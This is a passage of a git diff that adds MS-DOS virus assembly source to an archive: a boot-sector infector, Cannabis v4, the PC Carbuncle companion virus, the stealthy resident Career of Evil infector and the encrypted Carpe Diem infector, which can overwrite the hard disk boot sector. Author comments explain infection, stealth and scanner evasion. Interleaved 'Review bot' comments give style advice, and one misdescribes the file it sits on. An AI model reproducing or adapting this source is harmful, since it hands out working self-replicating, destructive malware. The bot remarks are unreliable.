7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_34e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + 
push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dx,0FFFEh + jnz loc_14 ; Jump if not zero + or ch,ch ; Zero ? + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cl,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_35e + mov di,data_23e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_33e + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 00h, 00h, 00h, 00h, 00h, 00h + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab4.asm b/MSDOS/Virus.MSDOS.Unknown.cannab4.asm new file mode 100644 index 00000000..9e3a2886 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab4.asm 
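Review bot: This file is the same blob as cannab3.asm: both `index` lines read `00000000..c6d1a179`, and every visible line, including the `CANNAB3` banner and the `Created: 6-Jun-92` stamp, is identical. A second copy under a different name adds nothing to the archive and will diverge silently once one of them is edited. Either drop it, or, if the `i` suffix was meant to denote a distinct sample, replace the content with that sample and add a header line such as `; cannab3i: <describe how it differs from cannab3>` so the distinction is documented.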
@@ -0,0 +1,264 @@ +;**************************************************************************** +;* Cannabis version 4 +;* +;* Compile with TASM 2.0 +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + .RADIX 16 + +BASE equ 7C00 + + org 0 + +begin: jmp start + + org 3 + + db 'CANNABIS' ;BIOS parameter block + dw 0200 + db 2 + dw 1 + db 2 + dw 112d + dw 720d + db 0FDh + dw 2 + dw 9 + dw 2 + dw 0 + + org 3E + +start: cld ;initialise segments + stack + cli + xor ax,ax + mov ss,ax + mov ds,ax + mov sp,7C00 + + mov bx,offset ni13+BASE ;check int13 vector + mov ax,ds:[4*13] + cmp ax,bx + je installed + + mov ds:[oi13+BASE],ax ;save old vector + mov ax,ds:[4*13+2] + mov di,400 + mov ds:[oi13+2+BASE],ax + + mov ax,ds:[di+13] + dec ax + mov cl,6 + mov ds:[di+13],ax + + shl ax,cl + sub ax,07C0 + + mov cx,0200 ;copy virus to top + mov di,sp + mov es,ax + mov si,sp + rep movsb + + mov ds:[4*13+2],es ;set new vector + mov ds:[4*13],bx + +installed: xor ax,ax + push ss + pop es + mov bx,0078 + lds si,ss:[bx] ;ds:si = int 1E (=table ptr) + push ds + push si + push ss + push bx + mov cx,0bh + mov di,7C3Eh ;move table -> ds:7C3E + rep movsb + push es + pop ds + mov cx,ds:[7C18] + mov byte ptr [di-2], 0fh + mov [bx+2],ax + mov [di-7],cl + + mov word ptr [bx],7C3E + sti + int 13 ;reset disk + jc error + mov cx,ds:[7C13] ;number of sectors + mov ds:[7C20],cx + mov ax,ds:[7C16] ;calculate root-entry (FAT) + shl ax,1 + inc ax + mov ds:[7C49],ax ;save value + mov ds:[7C50],ax + + mov ax,ds:[7C11] ;calculate IO.SYS entry + mov cl,4 + shr ax,cl + add ds:[7C49],ax + + mov ax,ds:[7C50] + mov bx,0500 + call readsector + jc error + cmp word ptr [bx], 'OI' ;IO.SYS ? 
+ jne ibmtest + cmp word ptr [bx+20], 'SM' ;MSDOS.SYS ? + je continue + jmp short error + +ibmtest: cmp word ptr [bx], 'BI' ;IBMBIO.COM ? + jne error + cmp word ptr [bx+20], 'BI' ;IBMDOS.COM ? + je continue + +error: mov si,offset errortxt+BASE ;print error-message + call print + xor ax,ax + int 16 ;wait for keypress + pop si ;restore int 1E vector + pop ds + pop [si] + pop [si+2] + int 19 ;boot again... + +continue: mov cx,3 ;at ds:0700 + mov bx,0700 + mov ax,ds:[7C49] + +nextsec: call readsector + jc error + add bx,0200 + inc ax + loop nextsec + + mov dl,0 + mov ch,ds:[7C15] ;go to begin IO.SYS + mov bx,ds:[7C49] + mov ax,0 + db 0EA, 0, 0, 70, 0 + + +;**************************************************************************** +;* Read a sector +;**************************************************************************** + +readsector: push cx + push ax + + div byte ptr ds:[7C18] ;al=sec/9 (0-160) ah=sec. (0-8) + cwd + inc ah ;ah=1-9 (sector) + shr al,1 ;al=0-80 (track) + adc dh,0 ;dh=0/1 (head) dl=0 (drive) + xchg ah,al + mov cx,0201 + xchg ax,cx + int 13 + + pop ax + pop cx +return: ret + + +;**************************************************************************** +;* Print message +;**************************************************************************** + +print: lodsb + or al,al + jz return + mov ah,0Eh + mov bx,7 + int 10 + jmp short print + + +;**************************************************************************** +;* Int 13 handler +;**************************************************************************** + +ni13: push ax + push ds + cmp ah,4 ;funktion 0-4? + ja cancel + cmp ch,1 + ja cancel + test dx,0FFFEh ;drive A: or B: ? 
(head=0) + jnz cancel + xor ax,ax + mov ds,ax + +infect: push cx + push bx + push di + push si + push es + mov ax,0201 ;read bootsector at 7E00 + mov bx,7E00 + mov cx,1 + push cs + push cs + pop ds + pop es + pushf + push cs + call orgint13 + jc exit + + mov di,7C0Bh ;move BPB to virus + mov cl,33 + mov si,7E0Bh + rep movsb + + mov ax,0301 ;write virus to boot-sector + mov bx,7C00 + mov cx,1 + pushf + push cs + call orgint13 + +exit: pop es + pop si + pop di + pop bx + pop cx + +cancel: pop ds + pop ax +orgint13: jmp dword ptr cs:[oi13+BASE] ;original vector + + +;**************************************************************************** +;* Data +;**************************************************************************** + +oi13 dw ?,? ;original int 13 vector + +errortxt db 0Dh, 0Ah, 'Non-System disk or disk error' + db 0Dh, 0Ah, 'Replace and press a key when ready' + db 0Dh, 0Ah, 0 + + + org 01FEh + + db 55, 0AA + +cseg ends + end begin + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.carbunc.asm b/MSDOS/Virus.MSDOS.Unknown.carbunc.asm new file mode 100644 index 00000000..67777e27 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.carbunc.asm 
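Review bot: The BPB under `org 3` is a run of bare `dw`/`db` values with a single `;BIOS parameter block` comment, so a reader must know the DOS boot-record layout by heart to see that `dw 0200` is bytes per sector, `dw 112d` the root-directory entries, `dw 720d` the total sector count of a 360K diskette and `0FDh` the media descriptor; one field name per line would make the block self-describing. The `.RADIX 16` directive changes the meaning of every unsuffixed number below it (`mov sp,7C00`, `db 55, 0AA`, `int 13`) and deserves a comment such as `; all unsuffixed literals below are hex; decimal needs a d suffix`. The comment `;funktion 0-4?` in `ni13` should read `;function 0-4?`, and the four `; 哪哪…` lines after `end begin` are mis-decoded box-drawing characters that the assembler ignores but that make the file display as mojibake.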
@@ -0,0 +1,244 @@ +;The PC CARBUNCLE VIRUS - a companion virus for Crypt Newsletter 14 +;The PC Carbuncle is a "toy" virus which will search out every .EXEfile +;in the current directory, rename it with a .CRP [for Crypt] extent and +;create a batchfile. The batchfile calls the PC Carbuncle [which has +;copied itself to a hidden file in the directory], renames the host +;file to its NORMAL extent, executes it, hides it as a .CRP file once +;again and issues a few error messages. The host files function +;normally. Occasionaly, the PC Carbuncle will copy itself to a few +;of the host .CRP files, destroying them. The majority of the host +;files in the PC Carbuncle-controlled directory will continue to function, +;in any case. If the user discovers the .CRP and .BAT files and is smart +;enough to delete the batchfiles and rename the .CRP hosts to their +;normal .EXE extents, the .CRPfiles which have been infected by the +;virus will re-establish the infection in the directory. +;--Urnst Kouch, Crypt Newsletter 14 + + .radix 16 + code segment + model small + assume cs:code, ds:code, es:code + + org 100h +begin: + jmp vir_start + db '釢.氣Nst哾塎$' ; name + +exit: + mov ah, 4Ch ; exit to DOS + int 21h +vir_start: + + mov ah,2Ch ; DOS get system time. + int 21h ; <--alter values to suit + cmp dh,10 ; is seconds > 10? + jg batch_stage ; if so, be quiet (jg) + ; with the virus counter, this feature arrests the + ; overwriting infection so + ; computing isn't + ; horribly disrupted + ; when the virus is about + mov al,5 ; infect only a few files + mov count,al ; by establishing a counter + + +start: mov ah,4Eh ; <----find first file of +recurse: + mov dx,offset crp_ext ; matching filemask, "*.crp" + int 21h ; because PC CARBUNCLE has + ; in most cases, already created + ; them. 
+ jc batch_stage ; jump on carry to + ; spawn if no .CRPfiles found + + + mov ax,3D01h ; open .CRPfile r/w + mov dx,009Eh + int 21h + + mov bh,40h ; + mov dx,0100h ; starting from beginning + xchg ax,bx ; put handle in ax + mov cl,2Ah ; to write: PC CARBUNCLE + int 21h ; write the virus + mov ah,3Eh ; close the file + int 21h + + dec count ; take one off the count + jz exit ; and exit when a few files + ; are overwritten with virus + mov ah,4Fh ; find next file + jmp Short recurse ; and continue until all .CRP + ; files converted to PC + ; CARBUNCLE's + + ret + +batch_stage: + mov dx,offset file_create ; create file, name of + mov cx,0 ; CARBUNCL.COM + mov ah,3ch + int 21h + ; Write virus body to file + mov bx,ax + mov cx,offset last - offset begin + mov dx,100h + mov ah,40h + int 21h + + ; Close file + mov ah,3eh ; ASSUMES bx still has file handle + int 21h + + ; Change attributes + mov dx,offset file_create ; of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + + + + ; get DTA + mov ah, 1Ah ; where to put dta + lea DX, [LAST+90H] + int 21h + mov ah, 4Eh ; find first .EXE file +small_loop: ; to CARBUNCL-ize + lea dx, [vict_ext] ; searchmask, *.exe + int 21h + jc exit + mov si, offset last + 90h + 30d ; save name + mov di, offset orig_name + mov cx, 12d + rep movsb + + mov si, offset orig_name ; put name in bat buffer + mov di, offset bat_name + mov cx, 12d + rep movsb + + cld + mov di, offset bat_name + mov al, '.' + mov cx, 9d + repne scasb + push cx + cmp word ptr es:[di-3],'SU' ; useless rubbish + jne cont + mov ah, 4fh + jmp small_loop + +cont: mov si, offset bat_ext ;fix bat + mov cx, 3 + rep movsb + pop cx + mov si, offset blank ;further fix bat + rep movsb + + mov si, offset orig_name ; fill rename + mov di, offset rename_name + mov cx, 12d + rep movsb + + mov di, offset rename_name + mov al, '.' 
+ mov cx, 9 + repne scasb + push cx + mov si, offset moc_ext ; fix rename + mov cx, 3 + rep movsb + pop cx + mov si, offset blank ; further fix rename + rep movsb ; copy the string over + + mov di, offset orig_name + mov al, ' ' + mov cx, 12 + repne scasb + mov si, offset blank ; put a few blanks + rep movsb + + mov si, offset orig_name ;fill in the created batfile + mov di, offset com1 + mov cx, 12d + rep movsb + + mov si, offset orig_name ; more fill + mov di, offset com2 + mov cx, 12d + rep movsb + + mov si, offset orig_name ; copy more fill + mov di, offset com3 + mov cx, 12d + rep movsb + mov si, offset blank +point_srch: dec di ; get rid of an annoying + cmp byte ptr [di], 00 ; period + jne point_srch + rep movsb + + mov si, offset rename_name ; copy more fill + mov di, offset moc1 + mov cx, 12d + rep movsb + + mov si, offset rename_name ; copy still more fill + mov di, offset moc2 + mov cx, 12d + rep movsb + + mov dx, offset orig_name ; rename original file + mov di, offset rename_name ; to new .CRP name + mov ah, 56h + int 21h + + mov dx, offset bat_name ; create batfile + xor cx, cx + mov ah, 3Ch + int 21h + + mov bx, ax + mov cx, (offset l_bat - offset s_bat) ; length of batfile + mov dx, offset s_bat ; write to file + mov ah, 40h + int 21h + + mov ah, 3eh ; close batfile + int 21h +next_vict: mov ah, 4fh ; find the next host + jmp small_loop ; and create more + ; "controlled" .CRPs +count db 90h ;<---count buffer, bogus value +crp_ext db "*.crp",0 ;<---- searchmask for PC CARBUNCLE +file_create db "CARBUNCL.COM",0 ;<---CARBUNCL shadow virus +bat_ext db "BAT" +Vict_ext db "*.exe",0 ;<----searchmask for hosts to CARBUNCL-ize +moc_ext db "CRP" ; new extent for CARBUNCL-ized hosts +blank db " " ;blanks for filling batchfile +S_bat: + db "@ECHO OFF",0Dh,0Ah ; <--batchfile command lines + db "CARBUNCL",0Dh,0Ah ; call PC CARBUNCL shadow virus + db "RENAME " +moc1 db 12 dup (' '),' ' +com1 db 12 dup (' '),0dh,0ah +com2 db 12 dup (' '),0dh,0ah + db "RENAME " 
+com3 db 12 dup (' '),' ' +moc2 db 12 dup (' '),0dh,0ah + db "CARBUNCL",0Dh,0Ah,01Ah ;<---put dumb message here +L_bat: ; format "ECHO Fuck you lamer" +note: db "PC CARBUNCLE: Crypt Newsletter 14",0 + +bat_name db 12 dup (' '),0 ; on the fly workspace +rename_name db 12 dup (' '),0 +orig_name db 12 dup (' '),0 +Last: ;<---- end of virus place-holder + + +code ends + end begin + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.caroevil.asm b/MSDOS/Virus.MSDOS.Unknown.caroevil.asm new file mode 100644 index 00000000..9aeab59c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.caroevil.asm 
@@ -0,0 +1,323 @@ +;CAREER OF EVIL virus: a simple memory resident .COMinfector +;which infects on execution and file open. CAREER OF EVIL also +;has limited stealth, subtracting its file size from infected files +;by diddling the file control block on "DIR" functions BEFORE the +;user sees the result onscreen. The virus recognizes infected +;files by setting a peculiar time-stamp in the unreported seconds +;field. Anti-virus measures are complicated when the virus is +;in memory by its ability to infect on file open. Scanning or +;operating any utilities which open files for inspection will +;spread the virus to every file examined in this manner. +;For best results, assemble CAREER OF EVIL with the A86 assembler. +;CAREER OF EVIL: prepared by Urnst Kouch for CRYPT NEWSLETTER 15, +;MAY-JUNE 1993. + + + code segment + assume cs:code, ds:code, es:code, ss:nothing + + org 0100h + + + +begin: call virus ; + +host db ' RottenUK' ; dummy place-holder where + ; virus stashes original 5-bytes + ; from host file +db 'Career of Evil',0 + + +virus: pop bp + push bp + add bp,0FEFDh + + mov ax,0ABCDh ; put 0ABCDh into ax + int 21h ; for installation check + ; (also critical in directory stealth) + jnb failed ; if virus is already there, + ; will branch + cli ; to virus exit when in memory + mov ax,3521h + int 21h ; get interrupt vector + mov w [bp+offset oldint21],bx ; es:bx points to + mov w [bp+offset oldint21+2],es ; interrupt handler + + mov al,1Ch + int 21h + + + mov si,ds + std + lodsb + cld + mov ds,si + + xor bx,bx + mov cx,pargrph ; virus size in paragraphs to allot-->cx + mov ax,[bx+3] ; an off hand way of doing things + sub ax,cx ; + + mov [bx+3],ax + sub [bx+12h],cx + mov es,[bx+12h] + + push cs + pop ds + + mov di,100h + mov si,bp + add si,di + mov cx,size + rep movsb ; start copying virus into memory + + push es + pop ds + mov ax,2521h + mov dx,offset newint21 ; set int 21 route through virus + int 21h + +failed: push cs + push cs + pop ds + pop es + + pop si + 
mov di,100h + push di + jmp $ + 2 + movsw + movsw + jmp $ + 2 + movsb + + mov cx,0FFh + mov si,100h + ret ; exit to host + +newint21: pushf + cmp ah,11h ; any "dir" user access of file control + je stealth_entry ; block must come through virus + cmp ah,12h ; next file directory handler + je stealth_entry + + cmp ax,0ABCDh ; we need this so that when the virus + jne not_virus_input ; is controlling things, on + popf ; file infect it doesn't go + clc ; and subtract another length + retf 2 ; increment from the directory + ; entries of infected files. + ; although an amusing effect, + ; reducing the filesize of all + ; infected files as reported + ; by DIR one virus length everytime + ; the virus infects ANY file is + ; counter-productive +not_virus_input: + cmp ax,4B00h ; is a program being loaded? + je check_infect ; try to infect + cmp ah,3Dh ; is a file being opened? + je start_open_infect ; if so, get address + jne not_4B00 ; exit if not + +stealth_entry: + + popf + call int21 ; look to virus "stealth" + pushf ; routine + call stealth_begin + +cycle_dirstealth: + popf ; remove word from the stack + iret ; and return from interrupt + ; to where we were before pulling +stealth_begin: ; stealth trick + push ax ; the following essentially massages the + push bx ; file control block on directory scans, + push dx ; subtracting the virus size from infected + push es ; files before the user sees it + ; stack setup saves everything + mov ah,2Fh ; get disk transfer address + call int21 ; + + add bx,8 + +normalize_direntry: + + mov al,byte es:[bx+16h] ; retrieve seconds data + and al,1fh ; from observed file, if it's + xor al,1fh ; 31, the file is infected + jnz no_edit_entry ; not 31 - file not infected + mov ax,word es:[bx+1Ch] + mov dx,word es:[bx+1Ch+2] + sub ax,size ; subtract virus length from + sbb dx,0 ; infected file + jc no_edit_entry ; no files? 
exit + mov word es:[bx+1Ch],ax + mov word es:[bx+1Ch+2],dx +no_edit_entry: ; restore everything as normal + pop es ; + pop dx + pop bx + pop ax + ret + +start_open_infect: + + mov word ptr cs:[fileseg],dx + mov word ptr cs:[fileseg+2h],ds ; save segment:offset of + ; file being opened so it + ; can be infected, too +check_infect: push ax ; push everything onto stack + push bx + push cx + push dx + push ds + push bp + + mov ax,4300h ; get file attributes of potential host + call int21 + jc back1 ; failed? exit + mov cs:old_attr,cx ; put attributes here + + + mov ax,4301h ; set new file attributes, read or write + xor cx,cx + call int21 ; do it + jc back1 ; error? exit + + push dx + push ds + call infect ; call infection subroutine + pop ds + pop dx + + mov ax,4301h ; same as above + db 0B9h ; hand code mov CX, +old_attr dw 0 + call int21 + +back1: ; if the attrib-get fails + pop bp ; pop everything off stack + pop ds + pop dx + pop cx + pop bx + pop ax + + +not_4B00: + +back: popf + db 0EAh ; <--------- return to virus exit to host + +oldint21 dw 0,0 + +int21: pushf + call dword ptr cs:oldint21 ; <--interrupt handler + ret + +infect: mov ax,3D02h ; open host file with read/write access + call int21 + jnc okay_open + ret ; was there an error? exit + +okay_open: xchg bx,ax + mov ax,5700h ; get file date and file time + call int21 + + push cx + mov bp,sp + push dx + + mov al,cl ; retrieve seconds data from file one + or cl,1fh ; more time + xor al,cl ; if it's 31 (1fh), we get a zero + jz close ; and the file is already infected + + mov ah,3Fh ; read first five bytes from potential host + mov cx,5 + mov dx,offset host ; store them here + push cs + pop ds + call int21 + jc close ; error, exit? + cmp al,5 ; get the five bytes? + jne close ; no, so exit + + cmp word host[0],'ZM' ; check, is this an .EXE file? + je close ; yes, so no infection + cmp host[0],0E9h ; does it start with a jump? + je infect_host ; yes - infect. Here's a + ; subtle point. 
MUST look for 0e9h + ; or file is not .EXE, not marked + ; virus time-stamp, infection will +close: ; result in the virus adding itself + ; to almost anything loaded or + pop dx ; opened which is not an .EXE or + pop cx ; .OVL. The result would be a hang. + mov ax,5701h ; reset file date and time + call int21 + mov ah,3Eh ; close file + call int21 + ret ; exit + +infect_host: mov ax,4202h ; reset pointer to end of file + xor cx,cx ; a standard appending infection + xor dx,dx ; routine which is suitable + call int21 ; for most resident .COM infecting + ; viruses + or dx,dx + jnz close + + + dec ax + dec ax + dec ax + + mov word ptr putjmp[1],ax + + mov ah,40h ; write virus to the target file + mov cx,size ; length in cx + mov dx,100h + call int21 + jc close + + mov ax,4200h ; set file pointer to beginning of host + xor cx,cx + xor dx,dx + call int21 + + mov ah,40h ; write the first five bytes of the + mov cx,5 ; viral jump and vanity string to the + mov dx,offset putjmp ; beginning of the host file + call int21 + + or byte ss:[bp],31 ; set the seconds field to 31, so the + ; "stealth" routine has its cue + jmp close ; close the file and clean up + + + + +putjmp db 0E9h ; <----- data, jump and vanity sig for + dw 0 ; virus to copy to beginning of host + db 'UK' + + + +fileseg dd ? ; <--- buffer for seg:off of files + ; opened by user activated programs + + +mark: ; <-----end of virus + +size equ $-100h ; +pargrph equ ($+16)/16 ; virus size in memory in 16-byte + ; paragraphs + + + code ends + end begin + + diff --git a/MSDOS/Virus.MSDOS.Unknown.carpdiem.asm b/MSDOS/Virus.MSDOS.Unknown.carpdiem.asm new file mode 100644 index 00000000..85146938 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.carpdiem.asm 
@@ -0,0 +1,292 @@ +; VirusName : CARPE DIEM! - Seize the day +; Origin : Sweden +; Author : Raver +; Date : 16/11/93 + +; Well this is my (Raver's) first scratch virus. +; This virus is mainly made for educational purpose (my own!). +; It's pretty well commented in an easy way so even you folks +; with little experience with assembler should be able to follow +; the code! + +; It's a pretty simple non-overwriting .com-infector with a harmless +; nuking routine. It clears and restores the file attributes and +; date/time stamp and finds and infects files using the dot-dot method. +; An encryption routine and some "unusual" instructions are included to +; avoid detection by the common virus scanners. At release date, see +; above, neither F-prot nor Tb-scan found traces of virus code! + +; There is about a 5 percent chance that the nuking routine will be +; activated, it checks the system time for 1/100 of a second. If it's +; activated it'll overwrite the first sector on the fixed disk (c:) +; which contains the boot sector. This might seem cruel but, infact, +; it's quite harmless 'cause norton utilities and other programs +; easily restore the boot sector. It's there just to make inexperienced +; users (lamers!) nervous! + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; CARPE DIEM! - Seize the day +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +cseg segment byte public 'code' + assume cs:cseg, ds:cseg + + org 100h + +start_of_virus: ;entry point + call get_off ;this somewhat unusual code won't +get_off: ;produce a flexible entry point flag + mov si,sp ;get the delta offset + mov bp,word ptr ss:[si] ;offset is on top of stack + sub bp,offset get_off ;put it in bp + inc sp ;restore sp to it's original + inc sp + +; call encrypt_decrypt ;decrypt the contents of the program + mov ax,bp ;use alternative code - otherwise + add ax,116h ;f-prot will recognize it as Radyum!!!! 
+ push ax + jmp encrypt_decrypt + jmp encrypted_code_start ;jmp to the (en/de)crypted virus area + + +encryption_value dw 0 ;random value for encryption routine + + +write_virus_to_file: ;proc to append virus code to file + + call encrypt_decrypt ;encrypt the virus before write + + mov cx,offset end_of_virus-100h ;length of virus to be written + lea dx,[bp] ;write from start + mov ax,word ptr [bp+end_of_virus+1ah+2] ;most significant part of + inc ah ;file length in DTA. Is + add dx,ax ;always 0 in .com-files. + mov ah,40h ;Use this trick to fool + int 21h ;heuristic searches. + ;dx = delta offset+100h + call encrypt_decrypt ;decrypt the code for + ret ;further processing. + + +encrypt_decrypt: ;proc to (en/de)crypt the code + mov dx,word ptr [bp+encryption_value] ;use random number for every + lea si,[bp+encrypted_code_start] ;new infection + mov cx,(end_of_virus-encrypted_code_start+1)/2 + +crypt_loop: ;xor the whole virus code + xor word ptr [si],dx ;between encrypted_code_start + add si,2 ;and end_of_virus + loop crypt_loop + + ret + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; Here the part that will be encrypted starts, i.e. all code +; except the encryption routine and the routine to append virus +; to file. +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +encrypted_code_start: + + cld + + mov ah,1ah ;Set DTA Transfer area to after + lea dx,[bp+end_of_virus] ;after the end of file to save file + int 21h ;size. Note: do not use default 80h + ;as DTA area since the parameters to + ;the "real" program will be overwritten! + + lea si,[bp+orgbuf] ;Transfer buffer contents + lea di,[bp+orgbuf2] ;to be restored to the beginning + mov cx,2 ;for restart of the "real" program + rep movsw + + mov di,2 ;Infection counter, 2 files every run + + mov ah,19h ;get current drive + int 21h + cmp al,2 ;check if a: or b: + jae get_cur_dir ;if so, skip infection. 
Otherwise + jmp no_more_files ;the user will most likely get + ;quite suspicious +get_cur_dir: + mov ah,47h ;get starting directory + xor dl,dl ;it will be changed by the + lea si,[bp+end_of_virus+2ch] ;dot-dot method later on + int 21h + +find_first: ;start finding the first .com file + mov cx,7 ;in every new dir + lea dx,[bp+filespec] + mov ah,4eh + int 21h + jnc clear_attribs ;successive? + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + ;otherwise jmp + +find_next: ;this is the upper point of the find + mov ah,4fh ;files loop in a dir + int 21h + jnc clear_attribs + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + +clear_attribs: ;set the file attribute to 0 + mov ax,4301h + xor cx,cx + lea dx,[bp+end_of_virus+1eh] + int 21h + +open_file: ;open file to be infected + mov ax,3d02h +; lea dx,[bp+end_of_virus+1eh] ;since clear_attribs + int 21h + + xchg ax,bx ;Put file handle in bx + +read_file: ;read first four bytes of file + mov ah,3fh ;They will be restore to the start + mov cx,4 ;after the virus is finnished + lea dx,[bp+orgbuf] ;so the program can execute + int 21h + +check_already_infected: ;check the first to bytes and check + mov si,dx ;if the file is already infected + lea si,[bp+orgbuf] + cmp word ptr [si],0e990h + je already_infected ;if so, jmp + + cmp word ptr [bp+end_of_virus+35],'DN' ;check if command.com + jz already_infected ;if so, don't infect + + mov ax,word ptr [bp+end_of_virus+1ah] ;check file size + cmp ax,500 ;and skip short and + jb already_infected ;long files + cmp ax,64000 + ja already_infected + + + mov ax,4202h ;get lenght of initial jmp in ax + xor cx,cx + xor dx,dx + int 21h + + sub ax,4 ;subtract the first four bytes, which + ;will be overwritten + + mov word ptr [bp+startbuf],0e990h ;load the buffer with a nop + mov word ptr [bp+startbuf+2],ax ;and a jmp to virus beginning + ;notice the reversed order! 
+ + mov ax,4200h ;move to beginning of file + int 21h + + mov ah,40h ;write the new instructions + mov cx,4 + lea dx,[bp+startbuf] + int 21h + + mov ax,4202h ;move to end of file + xor cx,cx + xor dx,dx + int 21h + + mov ah,2ch ;get a random number from + int 21h ;system clock for the + mov word ptr [bp+encryption_value],dx ;encryption routine + call write_virus_to_file ;append the virus code + jmp restore_time_date + +already_infected: ;if already encrypted increase + inc di ;infection counter with one + +restore_time_date: ;restore file time & date + lea si,[bp+end_of_virus+16h] + mov cx,word ptr [si] + mov dx,word ptr [si+2] + mov ax,5701h + int 21h + +close_file: ;close the file handle + mov ah,3eh + int 21h + +set_old_attrib: ;restore the old file attrib + mov ax,4301h + xor ch,ch + mov cl,byte ptr [bp+end_of_virus+15h] + lea dx,[bp+end_of_virus+1eh] + int 21h + + dec di ;decrease infection counter + cmp di,0 ;and check if infection is + jbe no_more_files ;completed + jmp find_next + +no_more_files: + + mov ah,2ch ;get a new random number + int 21h ;5% chance of nuke + cmp dl,5 + ja restore_start ;above 5 no nuke + + mov ax,0301h ;trash the bootsector of c: + mov cx,0001h ;This might seem cruel but + mov dx,0080h ;norton and other programs + lea bx,[bp+start_of_virus] ;easily fix it. It's just + int 13h ;to make the user nervous!! + + mov ah,09h ;deliver a 